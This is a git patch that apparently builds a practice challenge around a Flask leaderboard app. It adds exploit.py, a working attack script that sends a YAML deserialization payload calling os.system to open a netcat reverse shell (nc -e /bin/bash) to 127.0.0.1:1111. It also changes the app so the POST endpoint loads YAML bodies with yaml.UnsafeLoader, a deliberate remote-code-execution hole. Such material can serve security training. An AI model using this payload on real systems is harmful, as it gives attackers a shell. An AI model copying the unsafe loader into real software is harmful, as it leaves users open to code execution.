From adcb48800c2104476d245d578a820ba1daf04347 Mon Sep 17 00:00:00 2001 From: furtest Date: Fri, 5 Dec 2025 04:51:03 +0100 Subject: [PATCH] Working exploit and vuln --- exploit.py | 11 +++++++++++ flask_base/app.py | 14 ++++++++++++-- 2 files changed, 23 insertions(+), 2 deletions(-) create mode 100644 exploit.py diff --git a/exploit.py b/exploit.py new file mode 100644 index 0000000..be244c8 --- /dev/null +++ b/exploit.py @@ -0,0 +1,11 @@ +import requests + +malicious_yaml = """ +!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"] +""" +url = "http://127.0.0.1:8080/api/leaderboard" +headers = { + "Content-Type": "text/yaml" +} +response = requests.post(url, headers=headers, data=malicious_yaml) +print(response.text) diff --git a/flask_base/app.py b/flask_base/app.py index ed0543d..5651b8a 100644 --- a/flask_base/app.py +++ b/flask_base/app.py @@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE): def read_leaderboard(): with open(LEADERBOARD_FILE, 'r') as f: - return yaml.load(f, Loader=yaml.UnsafeLoader) or [] + return yaml.safe_load(f) or [] def write_leaderboard(data): + print(data) with open(LEADERBOARD_FILE, 'w') as f: yaml.safe_dump(data, f) @app.route('/api/leaderboard', methods=['POST']) def add_to_leaderboard(): - new_entry = request.json + if request.content_type == 'text/yaml' or request.content_type == 'application/yaml': + try: + new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader) + except yaml.YAMLError: + return jsonify({'error': 'Invalid YAML format'}), 400 + else: + new_entry = request.json + + print(new_entry) if not new_entry or 'name' not in new_entry or 'score' not in new_entry: return jsonify({'error': 'Name and score are required'}), 400 + leaderboard = read_leaderboard() leaderboard.append(new_entry) write_leaderboard(leaderboard)